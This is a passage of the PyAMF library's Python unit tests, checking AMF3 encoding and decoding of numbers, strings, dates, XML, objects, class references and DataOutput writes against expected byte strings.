        self.assertEncoded(x, b'\t\x03\tspam\x06\teggs\x01\x06\x0bhello')

        x = pyamf.MixedArray()
        x.update({0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 'a': 'a'})

        self.assertEncoded(
            x,
            b'\x09\x0d\x03\x61\x06\x00\x01\x04\x00\x04\x01\x04\x02\x04\x03\x04'
            b'\x04\x04\x05'
        )

    def test_empty_key_string(self):
        """
        Test to see if there is an empty key in the C{dict}. There is a design
        bug in Flash 9 which means that it cannot read this specific data.

        @bug: See U{http://www.docuverse.com/blog/donpark/2007/05/14/
            flash-9-amf3-bug}
        for more info.
        """
        def x():
            y = pyamf.MixedArray()
            y.update({'': 1, 0: 1})
            self.encode(y)

        self.assertRaises(pyamf.EncodeError, x)

    def test_object(self):
        # anonymous object: key order is dict-order dependent, so accept
        # either serialization
        try:
            self.assertEncoded(
                {'a': u'spam', 'b': 5},
                b'\n\x0b\x01\x03a\x06\tspam\x03b\x04\x05\x01'
            )
        except:
            self.assertEncoded(
                {'a': u'spam', 'b': 5},
                b'\n\x0b\x01\x03b\x04\x05\x03a\x06\tspam\x01'
            )

        pyamf.register_class(Spam, 'org.pyamf.spam')

        obj = Spam()
        obj.baz = 'hello'

        self.assertEncoded(
            obj,
            b'\n\x0b\x1dorg.pyamf.spam\x07baz\x06\x0bhello\x01'
        )

    def test_date(self):
        x = datetime.datetime(2005, 3, 18, 1, 58, 31)

        self.assertEncoded(x, b'\x08\x01Bp+6!\x15\x80\x00')
        # dates are reference-tracked as well
        self.assertEncoded(x, b'\x08\x00', clear=False)

        # bare time objects are not encodable
        self.assertRaises(pyamf.EncodeError, self.encode, datetime.time(22, 3))

    def test_byte_array(self):
        self.assertEncoded(amf3.ByteArray('hello'), b'\x0c\x0bhello')

    def test_xmlstring(self):
        x = xml.fromstring('<a><b>hello world</b></a>')
        self.assertEqual(self.encode(x), b'\x0b\x33<a><b>hello world</b></a>')
        # second encode is by reference
        self.assertEqual(self.encode(x), b'\x0b\x00')

    def test_anonymous(self):
        """A class registered without an alias name encodes anonymously."""
        pyamf.register_class(Spam)

        x = Spam({'spam': 'eggs'})

        self.assertEncoded(x, b'\n\x0b\x01\x09spam\x06\x09eggs\x01')

    def test_custom_type(self):
        """A type adapter registered via pyamf.add_type controls encoding."""
        def write_as_list(list_interface_obj, encoder):
            list_interface_obj.ran = True
            self.assertEqual(id(self.encoder), id(encoder))

            return list(list_interface_obj)

        class ListWrapper(object):
            ran = False

            def __iter__(self):
                return iter([1, 2, 3])

        pyamf.add_type(ListWrapper, write_as_list)

        x = ListWrapper()

        self.assertEncoded(x, b'\t\x07\x01\x04\x01\x04\x02\x04\x03')
        self.assertTrue(x.ran)

    def test_old_style_classes(self):
        class Person:
            pass

        pyamf.register_class(Person, 'spam.eggs.Person')

        u = Person()
        u.family_name = 'Doe'
        u.given_name = 'Jane'

        self.assertEncoded(u, b'\n\x0b!spam.eggs.Person', (
            b'\x17family_name\x06\x07Doe', b'\x15given_name\x06\tJane'), b'\x01')

    def test_slots(self):
        """Unregistered __slots__ classes encode anonymously."""
        class Person(object):
            __slots__ = ('family_name', 'given_name')

        u = Person()
        u.family_name = 'Doe'
        u.given_name = 'Jane'

        self.assertEncoded(
            u,
            b'\n\x0b\x01', (
                b'\x17family_name\x06\x07Doe',
                b'\x15given_name\x06\tJane'
            ),
            b'\x01'
        )

    def test_slots_registered(self):
        class Person(object):
            __slots__ = ('family_name', 'given_name')

        pyamf.register_class(Person, 'spam.eggs.Person')

        u = Person()
        u.family_name = 'Doe'
        u.given_name = 'Jane'

        self.assertEncoded(u, b'\n\x0b!spam.eggs.Person', (
            b'\x17family_name\x06\x07Doe', b'\x15given_name\x06\tJane'), b'\x01')

    def test_elementtree_tag(self):
        """An object that merely has a .tag attribute (duck-typing an
        ElementTree element) must still encode as a plain object."""
        class NotAnElement(object):
            def items(self):
                return []

            def __iter__(self):
                return iter([])

        foo = NotAnElement()
        foo.tag = 'foo'
        foo.text = 'bar'
        foo.tail = None

        self.assertEncoded(
            foo,
            b'\n\x0b\x01', (
                b'\ttext\x06\x07bar',
                b'\ttail\x01',
                b'\x07tag\x06\x07foo'
            ),
            b'\x01'
        )

    def test_funcs(self):
        """Callables/modules are not encodable."""
        def x():
            pass

        for f in (chr, lambda x: x, x, pyamf, ''.startswith):
            self.assertRaises(pyamf.EncodeError, self.encode, f)

    def test_29b_ints(self):
        """
        Tests for ints that don't fit into 29bits. Reference: #519
        """
        # out-of-range ints fall back to the double (TYPE_NUMBER) encoding
        ints = [
            (amf3.MIN_29B_INT - 1, b'\x05\xc1\xb0\x00\x00\x01\x00\x00\x00'),
            (amf3.MAX_29B_INT + 1, b'\x05A\xb0\x00\x00\x00\x00\x00\x00')
        ]

        for i, val in ints:
            self.buf.truncate()
            self.encoder.writeElement(i)

            self.assertEqual(self.buf.getvalue(), val)

    def test_number(self):
        """Ints use the variable-length 29-bit integer encoding; floats use
        the 8-byte IEEE-754 double encoding."""
        vals = [
            (0, b'\x04\x00'),
            (0.2, b'\x05\x3f\xc9\x99\x99\x99\x99\x99\x9a'),
            (1, b'\x04\x01'),
            (127, b'\x04\x7f'),
            (128, b'\x04\x81\x00'),
            (0x3fff, b'\x04\xff\x7f'),
            (0x4000, b'\x04\x81\x80\x00'),
            (0x1FFFFF, b'\x04\xff\xff\x7f'),
            (0x200000, b'\x04\x80\xc0\x80\x00'),
            (0x3FFFFF, b'\x04\x80\xff\xff\xff'),
            (0x400000, b'\x04\x81\x80\x80\x00'),
            (-1, b'\x04\xff\xff\xff\xff'),
            (42, b'\x04\x2a'),
            (-123, b'\x04\xff\xff\xff\x85'),
            (amf3.MIN_29B_INT, b'\x04\xc0\x80\x80\x00'),
            (amf3.MAX_29B_INT, b'\x04\xbf\xff\xff\xff'),
            (1.23456789, b'\x05\x3f\xf3\xc0\xca\x42\x83\xde\x1b')
        ]

        for i, val in vals:
            self.buf.truncate()
            self.encoder.writeElement(i)

            self.assertEqual(self.buf.getvalue(), val)

    def test_class(self):
        """Class objects themselves are not encodable."""
        class New(object):
            pass

        class Classic:
            pass

        with self.assertRaises(pyamf.EncodeError):
            self.encoder.writeElement(Classic)

        with self.assertRaises(pyamf.EncodeError):
            self.encoder.writeElement(New)

    def test_proxy(self):
        """
        Test to ensure that only C{dict} objects will be proxied correctly
        """
        self.encoder.use_proxies = True
        bytes = b'\n\x07;flex.messaging.io.ObjectProxy\n\x0b\x01\x01'

        self.assertEncoded(pyamf.ASObject(), bytes)
        self.assertEncoded({}, bytes)

    def test_proxy_non_dict(self):
        class Foo(object):
            pass

        self.encoder.use_proxies = True
        bytes = b'\n\x0b\x01\x01'

        self.assertEncoded(Foo(), bytes)

    def test_timezone(self):
        """A timezone_offset on the encoder shifts dates before writing."""
        d = datetime.datetime(2009, 9, 24, 14, 23, 23)
        self.encoder.timezone_offset = datetime.timedelta(hours=-5)

        self.encoder.writeElement(d)

        self.assertEqual(
            self.buf.getvalue(),
            b'\x08\x01Br>\xd8\x1f\xff\x80\x00'
        )

    def test_generator(self):
        """Generators are drained and their values encoded in sequence."""
        def foo():
            yield [1, 2, 3]
            yield u'\xff'
            yield pyamf.Undefined

        self.assertEncoded(
            foo(),
            b'\t\x07\x01\x04\x01\x04\x02\x04\x03\x06\x05'
            b'\xc3\xbf\x00'
        )

    def test_iterate(self):
        """The encoder is itself an iterator: send() queues values,
        next() yields the bytes for one queued value at a time."""
        self.assertRaises(StopIteration, self.encoder.__next__)

        self.encoder.send('')
        self.encoder.send('hello')
        self.encoder.send(u'ƒøø')

        self.assertEqual(next(self.encoder), b'\x06\x01')
        self.assertEqual(next(self.encoder), b'\x06\x0bhello')
        self.assertEqual(next(self.encoder), b'\x06\r\xc6\x92\xc3\xb8\xc3\xb8')

        self.assertRaises(StopIteration, self.encoder.__next__)

        self.assertIdentical(iter(self.encoder), self.encoder)

        self.assertEqual(
            self.buf.getvalue(),
            b'\x06\x01\x06\x0bhello\x06\r\xc6\x92\xc3\xb8\xc3\xb8'
        )

    def test_subclassed_tuple(self):
        """
        A subclassed tuple must encode an AMF list.

        @see: #830
        """
        class Foo(tuple):
            pass

        x = Foo([1, 2])

        self.encoder.send(x)

        self.assertEqual(next(self.encoder), b'\t\x05\x01\x04\x01\x04\x02')
class DecoderTestCase(ClassCacheClearingTestCase, DecoderMixIn):
    """
    Tests the output from the AMF3 L{Decoder<pyamf.amf3.Decoder>} class.

    Each test feeds AMF3 wire bytes to the decoder (via C{assertDecoded}
    from C{DecoderMixIn}) and checks the resulting Python value.
    """

    amf_type = pyamf.AMF3

    def setUp(self):
        ClassCacheClearingTestCase.setUp(self)
        DecoderMixIn.setUp(self)

    def test_undefined(self):
        self.assertDecoded(pyamf.Undefined, b'\x00')

    def test_number(self):
        self.assertDecoded(0, b'\x04\x00')
        self.assertDecoded(0.2, b'\x05\x3f\xc9\x99\x99\x99\x99\x99\x9a')
        self.assertDecoded(1, b'\x04\x01')
        self.assertDecoded(-1, b'\x04\xff\xff\xff\xff')
        self.assertDecoded(42, b'\x04\x2a')

        # two ways to represent -123, as an int and as a float
        self.assertDecoded(-123, b'\x04\xff\xff\xff\x85')
        self.assertDecoded(-123, b'\x05\xc0\x5e\xc0\x00\x00\x00\x00\x00')

        self.assertDecoded(1.23456789, b'\x05\x3f\xf3\xc0\xca\x42\x83\xde\x1b')

    def test_integer(self):
        """Exercises the 1- to 4-byte variable-length 29-bit int decoding."""
        self.assertDecoded(0, b'\x04\x00')
        self.assertDecoded(0x35, b'\x04\x35')
        self.assertDecoded(0x7f, b'\x04\x7f')
        self.assertDecoded(0x80, b'\x04\x81\x00')
        self.assertDecoded(0xd4, b'\x04\x81\x54')
        self.assertDecoded(0x3fff, b'\x04\xff\x7f')
        self.assertDecoded(0x4000, b'\x04\x81\x80\x00')
        self.assertDecoded(0x1a53f, b'\x04\x86\xca\x3f')
        self.assertDecoded(0x1fffff, b'\x04\xff\xff\x7f')
        self.assertDecoded(0x200000, b'\x04\x80\xc0\x80\x00')
        self.assertDecoded(-0x01, b'\x04\xff\xff\xff\xff')
        self.assertDecoded(-0x2a, b'\x04\xff\xff\xff\xd6')
        self.assertDecoded(0xfffffff, b'\x04\xbf\xff\xff\xff')
        self.assertDecoded(-0x10000000, b'\x04\xc0\x80\x80\x00')

    def test_infinites(self):
        """NaN and the infinities round-trip via the double encoding."""
        x = self.decode(b'\x05\xff\xf8\x00\x00\x00\x00\x00\x00')
        self.assertTrue(python.isNaN(x))

        x = self.decode(b'\x05\xff\xf0\x00\x00\x00\x00\x00\x00')
        self.assertTrue(python.isNegInf(x))

        x = self.decode(b'\x05\x7f\xf0\x00\x00\x00\x00\x00\x00')
        self.assertTrue(python.isPosInf(x))

    def test_boolean(self):
        self.assertDecoded(True, b'\x03')
        self.assertDecoded(False, b'\x02')

    def test_null(self):
        self.assertDecoded(None, b'\x01')

    def test_string(self):
        self.assertDecoded('', b'\x06\x01')
        self.assertDecoded('hello', b'\x06\x0bhello')
        # multi-byte UTF-8 content (Georgian text)
        self.assertDecoded(
            u'ღმერთსი შემვედრე, ნუთუ კვლა დამხსნას სოფლისა შრომასა, ცეცხლს',
            b'\x06\x82\x45\xe1\x83\xa6\xe1\x83\x9b\xe1\x83\x94\xe1\x83\xa0'
            b'\xe1\x83\x97\xe1\x83\xa1\xe1\x83\x98\x20\xe1\x83\xa8\xe1\x83'
            b'\x94\xe1\x83\x9b\xe1\x83\x95\xe1\x83\x94\xe1\x83\x93\xe1\x83'
            b'\xa0\xe1\x83\x94\x2c\x20\xe1\x83\x9c\xe1\x83\xa3\xe1\x83\x97'
            b'\xe1\x83\xa3\x20\xe1\x83\x99\xe1\x83\x95\xe1\x83\x9a\xe1\x83'
            b'\x90\x20\xe1\x83\x93\xe1\x83\x90\xe1\x83\x9b\xe1\x83\xae\xe1'
            b'\x83\xa1\xe1\x83\x9c\xe1\x83\x90\xe1\x83\xa1\x20\xe1\x83\xa1'
            b'\xe1\x83\x9d\xe1\x83\xa4\xe1\x83\x9a\xe1\x83\x98\xe1\x83\xa1'
            b'\xe1\x83\x90\x20\xe1\x83\xa8\xe1\x83\xa0\xe1\x83\x9d\xe1\x83'
            b'\x9b\xe1\x83\x90\xe1\x83\xa1\xe1\x83\x90\x2c\x20\xe1\x83\xaa'
            b'\xe1\x83\x94\xe1\x83\xaa\xe1\x83\xae\xe1\x83\x9a\xe1\x83\xa1')

    def test_mixed_array(self):
        """An array with both dense and associative parts decodes to a
        pyamf.MixedArray."""
        y = self.decode(
            b'\x09\x09\x03\x62\x06\x00\x03\x64\x06\x02\x03\x61'
            b'\x06\x04\x03\x63\x06\x06\x01\x04\x00\x04\x01\x04\x02\x04\x03'
        )

        self.assertTrue(isinstance(y, pyamf.MixedArray))
        self.assertEqual(y, {
            'a': u'a',
            'b': u'b',
            'c': u'c',
            'd': u'd',
            0: 0,
            1: 1,
            2: 2,
            3: 3
        })

    def test_string_references(self):
        self.assertDecoded('hello', b'\x06\x0bhello')
        self.assertDecoded('hello', b'\x06\x00', clear=False)
        self.assertDecoded('hello', b'\x06\x00', clear=False)

    def test_xmlstring(self):
        self.buf.write(b'\x0b\x33<a><b>hello world</b></a>')
        self.buf.seek(0, 0)

        x = self.decoder.readElement()
        self.assertEqual(xml.tostring(x), b'<a><b>hello world</b></a>')

        self.buf.truncate()
        self.buf.write(b'\x0b\x00')
        self.buf.seek(0, 0)

        # reference form must resolve to an equal document
        y = self.decoder.readElement()
        self.assertEqual(x, y)

    def test_xmlstring_references(self):
        self.buf.write(b'\x0b\x33<a><b>hello world</b></a>\x0b\x00')
        self.buf.seek(0, 0)

        x = self.decoder.readElement()
        y = self.decoder.readElement()

        # by-reference decode returns the *same* object
        self.assertEqual(id(x), id(y))

    def test_list(self):
        self.assertDecoded([], b'\x09\x01\x01')
        self.assertDecoded(
            [0, 1, 2, 3],
            b'\x09\x09\x01\x04\x00\x04\x01\x04\x02\x04\x03'
        )
        self.assertDecoded(
            ["Hello", 2, 3, 4, 5],
            b'\x09\x0b\x01\x06\x0b\x48\x65\x6c\x6c\x6f\x04\x02\x04\x03\x04\x04'
            b'\x04\x05'
        )

    def test_list_references(self):
        y = [0, 1, 2, 3]
        z = [0, 1, 2]

        self.assertDecoded(y, b'\x09\x09\x01\x04\x00\x04\x01\x04\x02\x04\x03')
        self.assertDecoded(y, b'\x09\x00', clear=False)
        self.assertDecoded(
            z,
            b'\x09\x07\x01\x04\x00\x04\x01\x04\x02',
            clear=False
        )
        self.assertDecoded(z, b'\x09\x02', clear=False)

    def test_dict(self):
        self.assertDecoded(
            {'a': u'a', 'b': u'b', 'c': u'c', 'd': u'd'},
            b'\n\x0b\x01\x03a\x06\x00\x03c\x06\x02\x03b\x06\x04\x03d\x06\x06'
            b'\x01'
        )
        self.assertDecoded(
            {0: u'hello', 'foo': u'bar'},
            b'\x09\x03\x07\x66\x6f\x6f\x06\x07\x62\x61\x72\x01\x06\x0b\x68\x65'
            b'\x6c\x6c\x6f'
        )
        self.assertDecoded(
            {0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 'a': 'a'},
            b'\x09\x0d\x03\x61\x06\x00\x01\x04\x00\x04\x01\x04\x02\x04\x03\x04'
            b'\x04\x04\x05'
        )
        self.assertDecoded(
            {
                'a': u'a',
                'b': u'b',
                'c': u'c',
                'd': u'd',
                0: 0,
                1: 1,
                2: 2,
                3: 3
            },
            b'\x09\x09\x03\x62\x06\x00\x03\x64\x06\x02\x03\x61\x06\x04\x03\x63'
            b'\x06\x06\x01\x04\x00\x04\x01\x04\x02\x04\x03'
        )
        self.assertDecoded(
            {'a': 1, 'b': 2},
            b'\x0a\x0b\x01\x03\x62\x04\x02\x03\x61\x04\x01\x01'
        )
        self.assertDecoded(
            {'baz': u'hello'},
            b'\x0a\x0b\x01\x07\x62\x61\x7a\x06\x0b\x68\x65\x6c\x6c\x6f\x01'
        )
        self.assertDecoded(
            {'baz': u'hello'},
            b'\x0a\x13\x01\x07\x62\x61\x7a\x06\x0b\x68\x65\x6c\x6c\x6f'
        )

        bytes = b'\x0a\x0b\x01\x07\x62\x61\x7a\x06\x0b\x68\x65\x6c\x6c\x6f\x01'

        self.buf.write(bytes)
        self.buf.seek(0)

        self.decoder.readElement()

    def test_object(self):
        pyamf.register_class(Spam, 'org.pyamf.spam')

        self.buf.truncate(0)
        self.buf.write(
            b'\x0a\x13\x1dorg.pyamf.spam\x07baz\x06\x0b\x68\x65\x6c\x6c\x6f')
        self.buf.seek(0)

        obj = self.decoder.readElement()

        self.assertEqual(obj.__class__, Spam)

        self.assertTrue(hasattr(obj, 'baz'))
        self.assertEqual(obj.baz, 'hello')

    def test_byte_array(self):
        self.assertDecoded(amf3.ByteArray('hello'), b'\x0c\x0bhello')

    def test_date(self):
        import datetime

        self.assertDecoded(
            datetime.datetime(2005, 3, 18, 1, 58, 31),
            b'\x08\x01Bp+6!\x15\x80\x00'
        )

    def test_not_strict(self):
        """In non-strict mode an unknown alias decodes to a TypedObject."""
        self.assertFalse(self.decoder.strict)

        # write a typed object to the stream
        # NOTE(review): this writes a str, not bytes, to the stream —
        # presumably the BufferedByteStream accepts both; confirm.
        self.buf.write('\n\x0b\x13spam.eggs\x07foo\x06\x07bar\x01')
        self.buf.seek(0)

        self.assertFalse('spam.eggs' in pyamf.CLASS_CACHE)

        obj = self.decoder.readElement()

        self.assertTrue(isinstance(obj, pyamf.TypedObject))
        self.assertEqual(obj.alias, 'spam.eggs')
        self.assertEqual(obj, {'foo': 'bar'})

    def test_strict(self):
        """In strict mode an unknown alias raises UnknownClassAlias."""
        self.decoder.strict = True

        self.assertTrue(self.decoder.strict)

        # write a typed object to the stream
        self.buf.write('\n\x0b\x13spam.eggs\x07foo\x06\x07bar\x01')
        self.buf.seek(0)

        self.assertFalse('spam.eggs' in pyamf.CLASS_CACHE)

        self.assertRaises(pyamf.UnknownClassAlias, self.decoder.readElement)

    def test_slots(self):
        class Person(object):
            __slots__ = ('family_name', 'given_name')

        pyamf.register_class(Person, 'spam.eggs.Person')

        self.buf.write(
            b'\n+!spam.eggs.Person\x17family_name\x15given_name\x06'
            b'\x07Doe\x06\tJane\x02\x06\x06\x04\x06\x08\x01'
        )
        self.buf.seek(0)

        foo = self.decoder.readElement()

        self.assertTrue(isinstance(foo, Person))
        self.assertEqual(foo.family_name, 'Doe')
        self.assertEqual(foo.given_name, 'Jane')
        self.assertEqual(self.buf.remaining(), 0)

    def test_default_proxy_flag(self):
        """New decoders pick up the module-level use_proxies_default."""
        amf3.use_proxies_default = True
        decoder = amf3.Decoder(self.buf, context=self.context)
        self.assertTrue(decoder.use_proxies)

        amf3.use_proxies_default = False
        decoder = amf3.Decoder(self.buf, context=self.context)
        self.assertFalse(decoder.use_proxies)

    def test_ioerror_buffer_position(self):
        """
        Test to ensure that if an IOError is raised by `readElement` that
        the original position of the stream is restored.
        """
        bytes = pyamf.encode(u'foo', [1, 2, 3], encoding=pyamf.AMF3).getvalue()

        self.buf.write(bytes[:-1])
        self.buf.seek(0)

        self.decoder.readElement()
        self.assertEqual(self.buf.tell(), 5)

        self.assertRaises(IOError, self.decoder.readElement)
        self.assertEqual(self.buf.tell(), 5)

    def test_timezone(self):
        """A timezone_offset on the decoder shifts decoded dates."""
        self.decoder.timezone_offset = datetime.timedelta(hours=-5)

        self.buf.write(b'\x08\x01Br>\xc6\xf5w\x80\x00')
        self.buf.seek(0)

        f = self.decoder.readElement()

        self.assertEqual(f, datetime.datetime(2009, 9, 24, 9, 23, 23))

    def test_iterate(self):
        """The decoder is itself an iterator: send() queues bytes,
        next() yields one decoded value at a time."""
        self.assertRaises(StopIteration, self.decoder.__next__)

        self.decoder.send(b'\x01')
        self.decoder.send(b'\x03')
        self.decoder.send(b'\x02')

        self.assertEqual(next(self.decoder), None)
        self.assertEqual(next(self.decoder), True)
        self.assertEqual(next(self.decoder), False)

        self.assertRaises(StopIteration, self.decoder.__next__)

        self.assertIdentical(iter(self.decoder), self.decoder)

    def test_bad_type(self):
        self.assertRaises(pyamf.DecodeError, self.decode, b'\xff')

    def test_kwargs(self):
        """
        Python <= 3 demand that kwargs keys be bytes instead of unicode/string.
        """
        def f(**kwargs):
            self.assertEqual(kwargs, {'spam': 'eggs'})

        kwargs = self.decode('\n\x0b\x01\tspam\x06\teggs\x01')

        f(**kwargs)

    def test_post_process(self):
        """
        Ensure that postprocessing happens when data has been decoded.
        """
        self.executed = False

        post_procs = pyamf.POST_DECODE_PROCESSORS[:]

        def restore_post_procs():
            pyamf.POST_DECODE_PROCESSORS = post_procs

        self.addCleanup(restore_post_procs)
        pyamf.POST_DECODE_PROCESSORS = []

        def postprocess(payload, context):
            self.assertEqual(payload, u'foo')
            self.assertEqual(context, {})

            self.executed = True

            return payload

        pyamf.add_post_decode_processor(postprocess)

        # setup complete
        bytes = pyamf.encode(u'foo', encoding=pyamf.AMF3).getvalue()

        self.decoder.send(bytes)
        ret = next(self.decoder)

        self.assertTrue(self.executed)
        self.assertEqual(ret, u'foo')
class ObjectEncodingTestCase(ClassCacheClearingTestCase, EncoderMixIn):
    """
    Tests AMF3 object/trait encoding: object references, class-definition
    references, and the static/dynamic/external trait encodings.
    """

    amf_type = pyamf.AMF3

    def setUp(self):
        ClassCacheClearingTestCase.setUp(self)
        EncoderMixIn.setUp(self)

    def test_object_references(self):
        """Encoding the same object twice emits a 2-byte reference."""
        obj = pyamf.ASObject(a='b')

        self.encoder.writeElement(obj)
        pos = self.buf.tell()
        self.encoder.writeElement(obj)

        self.assertEqual(self.buf.getvalue()[pos:], b'\x0a\x00')
        self.buf.truncate()

        self.encoder.writeElement(obj)
        self.assertEqual(self.buf.getvalue(), b'\x0a\x00')
        self.buf.truncate()

    def test_class_references(self):
        """The second instance of a registered class reuses the class-def
        by reference (b'\\n\\x01' prefix)."""
        alias = pyamf.register_class(Spam, 'abc.xyz')

        x = Spam({'spam': 'eggs'})
        y = Spam({'foo': 'bar'})

        self.encoder.writeElement(x)

        cd = self.context.getClass(Spam)

        self.assertTrue(cd.alias is alias)

        self.assertEqual(
            self.buf.getvalue(),
            b'\n\x0b\x0fabc.xyz\tspam\x06\teggs\x01'
        )
        pos = self.buf.tell()

        self.encoder.writeElement(y)
        self.assertEqual(
            self.buf.getvalue()[pos:],
            b'\n\x01\x07foo\x06\x07bar\x01'
        )

    def test_static(self):
        """Static (non-dynamic) aliases encode only declared attrs."""
        alias = pyamf.register_class(Spam, 'abc.xyz')

        alias.dynamic = False

        x = Spam({'spam': 'eggs'})
        self.encoder.writeElement(x)

        # no static attrs declared -> nothing beyond the class name
        self.assertEqual(self.buf.getvalue(), b'\n\x03\x0fabc.xyz')

        pyamf.unregister_class(Spam)
        self.buf.truncate()
        self.encoder.context.clear()

        alias = pyamf.register_class(Spam, 'abc.xyz')
        alias.dynamic = False
        alias.static_attrs = ['spam']

        x = Spam({'spam': 'eggs', 'foo': 'bar'})
        self.encoder.writeElement(x)

        # only the declared static attr is written; 'foo' is dropped
        self.assertEqual(
            self.buf.getvalue(),
            b'\n\x13\x0fabc.xyz\tspam\x06\teggs'
        )

    def test_dynamic(self):
        pyamf.register_class(Spam, 'abc.xyz')

        x = Spam({'spam': 'eggs'})
        self.encoder.writeElement(x)

        self.assertEqual(
            self.buf.getvalue(),
            b'\n\x0b\x0fabc.xyz\tspam\x06\teggs\x01'
        )

    def test_combined(self):
        """Static attrs come first, then the dynamic section."""
        alias = pyamf.register_class(Spam, 'abc.xyz')
        alias.static_attrs = ['spam']

        x = Spam({'spam': 'foo', 'eggs': 'bar'})
        self.encoder.writeElement(x)

        buf = self.buf.getvalue()

        self.assertEqual(
            buf,
            b'\n\x1b\x0fabc.xyz\tspam\x06\x07foo\teggs\x06\x07bar\x01'
        )

    def test_external(self):
        alias = pyamf.register_class(Spam, 'abc.xyz')
        alias.external = True

        x = Spam({'spam': 'eggs'})
        self.encoder.writeElement(x)

        buf = self.buf.getvalue()

        # an inline object with and inline class-def, encoding = 0x01, 1 attr
        self.assertEqual(buf[:2], b'\x0a\x07')
        # class alias name
        self.assertEqual(buf[2:10], b'\x0fabc.xyz')

        # externalizable bodies are written by the class itself; Spam writes
        # nothing, so the stream ends after the alias name
        self.assertEqual(len(buf), 10)

    def test_anonymous_class_references(self):
        """
        Test to ensure anonymous class references with static attributes
        are encoded propertly
        """
        class Foo:
            class __amf__:
                static = ('name', 'id', 'description')

        x = Foo()
        x.id = 1
        x.name = 'foo'
        x.description = None

        y = Foo()
        y.id = 2
        y.name = 'bar'
        y.description = None

        self.encoder.writeElement([x, y])

        self.assertEqual(
            self.buf.getvalue(),
            b'\t\x05\x01\n;\x01\x17description\x05id\tname\x01\x04\x01\x06\x07'
            b'foo\x01\n\x01\x01\x04\x02\x06\x07bar\x01'
        )
class ObjectDecodingTestCase(ClassCacheClearingTestCase, DecoderMixIn):
    """
    Tests AMF3 object/trait decoding: object references and the
    static/dynamic/external trait encodings.
    """

    amf_type = pyamf.AMF3

    def setUp(self):
        ClassCacheClearingTestCase.setUp(self)
        DecoderMixIn.setUp(self)

    def test_object_references(self):
        """Decoding a reference yields the identical object."""
        self.buf.write(b'\x0a\x23\x01\x03a\x03b\x06\x09spam\x04\x05')
        self.buf.seek(0, 0)

        obj1 = self.decoder.readElement()

        self.buf.truncate()
        # NOTE(review): this writes a str, not bytes, to the stream —
        # presumably the BufferedByteStream accepts both; confirm.
        self.buf.write('\n\x00')
        self.buf.seek(0, 0)

        obj2 = self.decoder.readElement()

        self.assertEqual(id(obj1), id(obj2))

    def test_static(self):
        pyamf.register_class(Spam, 'abc.xyz')

        self.buf.write(b'\x0a\x13\x0fabc.xyz\x09spam\x06\x09eggs')
        self.buf.seek(0, 0)

        obj = self.decoder.readElement()

        class_def = self.context.getClass(Spam)

        self.assertTrue("spam" in obj.__dict__)
        self.assertEqual(class_def.static_properties, ['spam'])

        self.assertTrue(isinstance(obj, Spam))
        self.assertEqual(obj.__dict__, {'spam': 'eggs'})

    def test_dynamic(self):
        pyamf.register_class(Spam, 'abc.xyz')

        self.buf.write(b'\x0a\x0b\x0fabc.xyz\x09spam\x06\x09eggs\x01')
        self.buf.seek(0, 0)

        obj = self.decoder.readElement()

        class_def = self.context.getClass(Spam)

        self.assertEqual(class_def.static_properties, [])

        self.assertTrue(isinstance(obj, Spam))
        self.assertEqual(obj.__dict__, {'spam': 'eggs'})

    def test_combined(self):
        """
        This tests an object encoding with static properties and dynamic
        properties
        """
        pyamf.register_class(Spam, 'abc.xyz')

        self.buf.write(b'\x0a\x1b\x0fabc.xyz\x09spam\x06\x09eggs\x07baz\x06\x07nat\x01')
        self.buf.seek(0, 0)

        obj = self.decoder.readElement()

        class_def = self.context.getClass(Spam)

        self.assertEqual(class_def.static_properties, ['spam'])

        self.assertTrue(isinstance(obj, Spam))
        self.assertEqual(obj.__dict__, {'spam': 'eggs', 'baz': 'nat'})

    def test_external(self):
        """Externalizable decode creates the instance; Spam reads nothing,
        so the instance dict stays empty."""
        alias = pyamf.register_class(Spam, 'abc.xyz')
        alias.external = True

        self.buf.write(b'\x0a\x07\x0fabc.xyz')
        self.buf.seek(0)

        x = self.decoder.readElement()

        self.assertTrue(isinstance(x, Spam))
        self.assertEqual(x.__dict__, {})
class DataOutputTestCase(unittest.TestCase, EncoderMixIn):
"""
"""
amf_type = pyamf.AMF3
def setUp(self):
EncoderMixIn.setUp(self)
self.x = amf3.DataOutput(self.encoder)
def test_create(self):
self.assertEqual(self.x.encoder, self.encoder)
self.assertEqual(self.x.stream, self.buf)
def test_boolean(self):
self.x.writeBoolean(True)
self.assertEqual(self.buf.getvalue(), b'\x01')
self.buf.truncate()
self.x.writeBoolean(False)
self.assertEqual(self.buf.getvalue(), b'\x00')
def test_byte(self):
for y in range(10):
self.x.writeByte(y)
self.assertEqual(
self.buf.getvalue(),
b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09'
)
def test_double(self):
self.x.writeDouble(0.0)
self.assertEqual(self.buf.getvalue(), b'\x00' * 8)
self.buf.truncate()
self.x.writeDouble(1234.5678)
self.assertEqual(self.buf.getvalue(), b'@\x93JEm\\\xfa\xad')
def test_float(self):
self.x.writeFloat(0.0)
self.assertEqual(self.buf.getvalue(), b'\x00' * 4)
self.buf.truncate()
self.x.writeFloat(1234.5678)
self.assertEqual(self.buf.getvalue(), b'D\x9aR+')
def test_int(self):
self.x.writeInt(0)
self.assertEqual(self.buf.getvalue(), b'\x00\x00\x00\x00')
self.buf.truncate()
self.x.writeInt(-12345)
self.assertEqual(self.buf.getvalue(), b'\xff\xff\xcf\xc7')
self.buf.truncate()
self.x.writeInt(98)
self.assertEqual(self.buf.getvalue(), b'\x00\x00\x00b')
def test_object(self):
obj = pyamf.MixedArray(spam='eggs')
self.x.writeObject(obj)
self.assertEqual(self.buf.getvalue(), b'\t\x01\tspam\x06\teggs\x01')
self.buf.truncate()
# check references
self.x.writeObject(obj)
self.assertEqual(self.buf.getvalue(), b'\t\x00')
self.buf.truncate()
def test_object_proxy(self):
self.encoder.use_proxies = True
obj = {'spam': 'eggs'}
self.x.writeObject(obj)
self.assertEqual(
self.buf.getvalue(),
b'\n\x07;flex.messaging.io.ObjectProxy\n\x0b\x01\tspam\x06\teggs'
b'\x01'
)
self.buf.truncate()
# check references
self.x.writeObject(obj)
self.assertEqual(self.buf.getvalue(), b'\n\x00')
self.buf.truncate()
def test_object_proxy_mixed_array(self):
self.encoder.use_proxies = True
obj = pyamf.MixedArray(spam='eggs')
self.x.writeObject(obj)
self.assertEqual(
self.buf.getvalue(),
b'\n\x07;flex.messaging.io.ObjectProxy\n\x0b\x01\tspam\x06\teggs'
b'\x01'
)
self.buf.truncate()
